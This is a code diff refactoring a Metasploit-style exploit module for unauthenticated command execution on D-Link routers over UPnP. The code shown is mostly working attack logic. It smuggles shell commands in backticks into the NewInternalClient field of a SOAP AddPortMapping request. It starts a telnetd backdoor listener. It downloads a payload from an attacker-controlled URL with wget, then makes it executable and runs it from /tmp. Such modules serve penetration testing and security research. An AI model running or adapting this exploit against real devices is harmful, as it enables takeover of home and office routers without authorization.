Use instance variables

Author: jvazquez-r7

modules/exploits/linux/http/dlink_upnp_exec_noauth.rb

@@ -85,51 +85,51 @@ def initialize(info = {})
 	end
 
 	def exploit
-		new_portmapping_description = rand_text_alpha(8)
-		new_external_port = rand(65535)
-		new_internal_port = rand(65535)
+		@new_portmapping_descr = rand_text_alpha(8)
+		@new_external_port = rand(65535)
+		@new_internal_port = rand(65535)
 
 		if target.name =~ /CMD/
-			exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+			exploit_cmd
 		elsif target.name =~ /Telnet/
-			exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
+			exploit_telnet
 		else
-			exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
+			exploit_mips
 		end
 	end
 
-	def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+	def exploit_cmd
 		if not (datastore['CMD'])
 			fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
 		end
 		cmd = payload.encoded
 		type = "add"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 		type = "delete"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		return
 	end
 
-	def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
+	def exploit_telnet
 		telnetport = rand(65535)
 
 		vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
 		cmd = "telnetd -p #{telnetport}"
 		type = "add"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		type = "delete"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
@@ -168,7 +168,7 @@ def exploit_telnet(new_external_port, new_internal_port, new_portmapping_descrip
 		return
 	end
 
-	def exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
+	def exploit_mips
 
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
@@ -220,7 +220,7 @@ def exploit_mips(new_external_port, new_internal_port, new_portmapping_descripti
 
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
 		type = "add"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
@@ -236,13 +236,13 @@ def exploit_mips(new_external_port, new_internal_port, new_portmapping_descripti
 		register_file_for_cleanup("/tmp/#{filename}")
 
 		type = "delete"
-		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		res = request(cmd, type)
 		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 	end
 
-	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+	def request(cmd, type)
 
 		uri = '/soap.cgi'
 
@@ -256,22 +256,22 @@ def request(cmd, type, new_external_port, new_internal_port, new_portmapping_des
 			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
 
 			data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
+			data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
 			data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
 			data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
 			data_cmd << "<NewEnabled>1</NewEnabled>"
-			data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
+			data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
 			data_cmd << "<NewRemoteHost></NewRemoteHost>"
 			data_cmd << "<NewProtocol>TCP</NewProtocol>"
-			data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
+			data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
 			data_cmd << "</m:AddPortMapping>"
 		else
 			#we should clean it up ... otherwise we are not able to exploit it multiple times
 			vprint_status("#{rhost}:#{rport} - deleting portmapping")
 			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
 
 			data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
+			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
 			data_cmd << "</m:DeletePortMapping>"
 		end